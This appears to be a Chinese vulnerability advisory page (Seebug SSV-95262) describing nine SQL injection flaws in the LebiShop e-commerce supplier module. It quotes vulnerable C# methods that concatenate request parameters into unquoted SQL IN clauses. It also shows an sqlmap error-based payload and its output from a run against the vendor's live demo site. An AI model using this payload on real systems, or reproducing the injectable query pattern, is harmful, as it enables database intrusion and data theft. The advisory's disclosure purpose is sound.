LebiShop商城系统最新版九处SQL注入四

基本字段

漏洞编号：: SSV-95262

披露/发现时间：: 2015-01-23

提交时间：: 2015-01-23

漏洞等级：

漏洞类别：: 其他类型

影响组件：: LebiShop

漏洞作者：: xfkxfk

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2015-092914

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： LebiShop商城系统最新版九处SQL注入四 ### 详细说明： LebiShop商城系统最新版九处SQL注入因为这里是在商家模块，所以官方demo演示地址为： ``` http://plus.demo.lebi.cn ``` 注册并登陆普通用户后，才有申请注册商家用户的功能，这里的商家注册功能是默认开发注册的所以我们注册普通用户shoptest，然后申请注册商家用户即可此时shoptest用户及时普通用户也是商家用户下面来看看申请注册商家用户后的SQL注入漏洞第一处SQL注入漏洞 Shop.supplier.ajax目录下的ajax_product.aspx文件首先看看Ask_Del方法： ``` // Shop.supplier.Ajax.Ajax_product public void Ask_Del() { if (!base.Power("supplier_ask_del", "删除商品咨询")) { base.AjaxNoPower(); return; } string id = RequestTool.RequestString("Delid"); if (id == "") { base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}"); return; } B_Lebi_Comment.Delete("Parentid in (" + id + ")"); B_Lebi_Comment.Delete("id in (" + id + ")"); Log.Add("删除商品咨询", "Comment", id.ToString(), this.CurrentSupplier, id.ToString()); base.Response.Write("{\"msg\":\"OK\"}"); } ``` 参数id通过RequestTool.RequestString("Delid");获取然后进入delete方法的in条件sql语句中因为在RequestString中只处理了单引号，但是在in条件中没有引号保护，导致sql注入产生第二处SQL注入 ``` // Shop.supplier.Ajax.Ajax_product public void Comment_Del() { if (!base.Power("supplier_comment_del", "删除商品评价")) { base.AjaxNoPower(); return; } string id = RequestTool.RequestString("Delid"); if (id == "") { base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}"); return; } B_Lebi_Comment.Delete("Parentid in (" + id + ")"); B_Lebi_Comment.Delete("id in (" + id + ")"); Log.Add("删除商品评价", "Comment", id.ToString(), this.CurrentSupplier, id.ToString()); base.Response.Write("{\"msg\":\"OK\"}"); } ``` SQL注入原因同第一处SQL注入原因第三处SQL注入 ``` // Shop.supplier.Ajax.Ajax_product public void Comment_Update() { if (!base.Power("supplier_comment_edit", "编辑商品评价")) { base.AjaxNoPower(); return; } string ids = RequestTool.RequestString("IDS"); List<Lebi_Comment> models = B_Lebi_Comment.GetList("id in (" + ids + ")", ""); ``` SQL注入原因同第一处SQL注入原因，ids进入GetList方法的in条件sql语句，无单引号第四处SQL注入 ``` // Shop.supplier.Ajax.Ajax_product public void Product_Batch_Update() { if (!base.Power("supplier_product_batch_edit", "批量编辑")) { base.AjaxNoPower(); return; } string ids = RequestTool.RequestString("IDS"); List<Lebi_Product> models = B_Lebi_Product.GetList("id in (" + ids + ")", ""); ``` SQL注入原因同上第五处SQL注入 ``` // Shop.supplier.Ajax.Ajax_product public void Product_Del() { if (!base.Power("supplier_product_del", "删除商品")) { base.AjaxNoPower(); return; } string id = RequestTool.RequestString("sonproductid"); if (id == "") { base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}"); return; } List<Lebi_Product> pros = B_Lebi_Product.GetList("Product_id in (" + id + ")", ""); foreach (Lebi_Product pro in pros) { id = id + "," + pro.id; } ImageHelper.LebiImagesDelete("product", id); B_Lebi_Product.Delete("id in (" + id + ")"); Log.Add("删除商品", "Product", id.ToString(), this.CurrentSupplier, id.ToString()); base.Response.Write("{\"msg\":\"OK\"}"); } ``` SQL注入原因同上这里存在多处SQL注入问题，在GetList，LebiImagesDelete，Delete方法中都存在sql注入问题第六处SQL注入 ``` // Shop.supplier.Ajax.Ajax_product public void Product_Image_Edit_muti() { if (!base.Power("supplier_product_edit", "编辑商品")) { base.AjaxNoPower(); return; } string ids = RequestTool.RequestString("ids"); string imagesmall = RequestTool.RequestString("smalliamge"); string images = RequestTool.RequestString("images"); List<Lebi_Product> models = B_Lebi_Product.GetList("id in (" + ids + ")", ""); ``` SQL注入原因同上第七处SQL注入 ``` // Shop.supplier.Ajax.Ajax_product public void Product_Status_Edit_muti() { if (!base.Power("supplier_product_edit", "编辑商品")) { base.AjaxNoPower(); return; } int status = RequestTool.RequestInt("status", 0); string ids = RequestTool.RequestString("sonproductid"); if (ids == "") { base.Response.Write("{\"msg\":\"" + base.Tag("请选择要修改的商品") + "\"}"); return; } status = ((status == 1) ? 101 : 100); if (this.CurrentSupplierGroup.IsSubmit == 0) { status = 100; } List<Lebi_Product> models = B_Lebi_Product.GetList("id in (" + ids + ")", ""); ``` SQL注入原因同上第八处SQL注入 ``` // Shop.supplier.Ajax.Ajax_product public void Supplier_ProductType_Edit() { if (!base.Power("supplier_product_edit", "编辑商品")) { base.AjaxNoPower(); return; } string ids = RequestTool.RequestString("ids"); if (ids == "") { base.Response.Write("{\"msg\":\"" + base.Tag("请选择要修改的商品") + "\"}"); return; } List<Lebi_Product> models = B_Lebi_Product.GetList(string.Concat(new object[] { "Supplier_id = ", this.CurrentSupplier.id, " and id in (", ids, ")" }), ""); ``` SQL注入原因同上第九处SQL注入 ``` // Shop.supplier.Ajax.Ajax_product public void Type_Del() { if (!base.Power("supplier_pro_type", "商品分类")) { base.AjaxNoPower(); } string id = RequestTool.RequestString("id"); if (id == "") { base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}"); return; } B_Lebi_Supplier_ProductType.Delete("id in (" + id + ")"); ImageHelper.LebiImagesDelete("supplierproducttype", id); Log.Add("删除商品分类", "Pro_Type", id.ToString(), this.CurrentSupplier, id.ToString()); base.Response.Write("{\"msg\":\"OK\"}"); } ``` SQL注入原因同上 ### 漏洞证明：以第一处为例证明官方demo测试报出mssql版本： [<img src="https://images.seebug.org/upload/201501/20161740aad3506dad4ea5eaa52f05ac5ffdf5a8.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/20161740aad3506dad4ea5eaa52f05ac5ffdf5a8.png) 报出当前数据库： [<img src="https://images.seebug.org/upload/201501/2016180671f7b1fe647504c4a5059a39f47b97fa.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2016180671f7b1fe647504c4a5059a39f47b97fa.png) 使用sqlmap跑一下数据： ``` --- Place: POST Parameter: Delid Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Delid=123) AND 3591=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(103)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (3591=3591) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(103)+CHAR(118)+CHAR(120)+CHAR(113))) AND (1472=1472 --- [16:18:35] [INFO] testing Microsoft SQL Server [16:18:35] [INFO] confirming Microsoft SQL Server [16:18:36] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: Microsoft SQL Server 2005 [16:18:36] [INFO] fetching current database [16:18:36] [INFO] retrieved: db_plusdemolebicn current database: 'db_plusdemolebicn' [16:18:36] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 39 times [16:18:36] [INFO] fetched data logged to text files under 'C:\Users\user\Desktop\sqlmap\output\plus.demo.lebi.cn' ```

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-092914

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

LebiShop商城系统最新版九处SQL注入四

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定